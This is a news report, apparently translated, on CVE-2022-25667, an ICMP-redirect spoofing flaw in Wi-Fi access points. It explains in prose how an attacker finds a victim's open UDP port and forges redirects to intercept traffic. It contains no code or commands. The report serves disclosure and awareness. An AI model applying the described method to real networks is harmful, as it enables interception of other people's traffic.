If exploited, these flaws can allow attackers to gain unauthorized access to sensitive information or generally cause problems
The news was released that a group of researchers from Tsinghua University (China) and George Mason University (USA) disclosed information about a vulnerability (CVE-2022-25667) at access points that allows to organize the interception of traffic (MITM) in wireless networks protected by means of WPA, WPA2 and WPA3 protocols.
By handling ICMP packets With the "redirect" flag, an attacker can redirect the victim's traffic within the wireless network through their system, which can be used to intercept and spoof unencrypted sessions (for example, requests to non-HTTPS sites).
Vulnerability is caused by a lack of proper filtering of spoofed ICMP messages with sender address spoofing on network processors (NPUs, Network Processing Units), which provide low-level packet processing on a wireless network.
Among other things, the NPUs redirected, without checking for forgery, bogus ICMP packets with the "redirect" flag, which can be used to change routing table parameters on the victim user's side.
The central idea is to misuse the vulnerability of interlayer interactions between WPAs and ICMP protocols, totally evading the link layer security mechanisms applied by WPAs.
The attack is reduced to sending an ICMP packet on behalf of the access point with the "redirect" flag, which indicates dummy data in the packet header. Due to the vulnerability, the message is forwarded by the access point and processed by the victim's network stack, which assumes that the message was sent by the access point.
We meet two requirements to successfully launch our attack. First, when the attacker spoofs the legitimate AP to create an ICMP redirect message, the AP cannot recognize and filter those spoofed ICMP redirects.
In addition, the researchers proposed a method to bypass the checks of ICMP packets with the "redirect" flag on the end user's side and change their routing table. To circumvent the filtering, the attacker first determines an active UDP port on the victim's side.
Second, we developed a new method to ensure that the spoofed ICMP redirect message can evade the victim's legitimacy check and then poison their routing table. We conducted an extensive measurement study on 122 real-world Wi-Fi networks, covering all of the prevailing Wi-Fi security modes
Being on the same wireless network, the attacker can intercept the traffic, but cannot decrypt it, because he does not know the session key used when the victim accesses the access point. However, by sending test packets to the victim, the attacker can determine the active UDP port based on analysis of incoming ICMP responses with the "Destination Unreachable" flag. The attacker then generates an ICMP message with the "redirect" flag and a forged UDP header specifying the identified open UDP port.
The problem has been confirmed on access points using HiSilicon and Qualcomm chips. A study of 55 different models of access points from 10 well-known manufacturers (Cisco, NetGear, Xiaomi, Mercury, 360, Huawei, TP-Link, H3C, Tenda, Ruijie) showed that all of them are vulnerable and do not block packet forgeries. ICMP. Additionally, analysis of 122 existing wireless networks revealed the possibility of an attack on 109 networks (89%).
To exploit vulnerabilities, an attacker must be able to legitimately connect to a Wi-Fi network, that is, it must know the parameters to enter the wireless network (the vulnerabilities make it possible to circumvent the mechanisms used in the WPA* protocols to separate user traffic within the network).
Unlike traditional MITM attacks on wireless networks, using the ICMP packet spoofing technique, the attacker can bypass deploying their own rogue access point to intercept traffic and use legitimate network-serving access points to redirect packets. ICMP specially crafted to the victim.
Finally, if you are interested in being able to know more about it, you can consult the details in the following link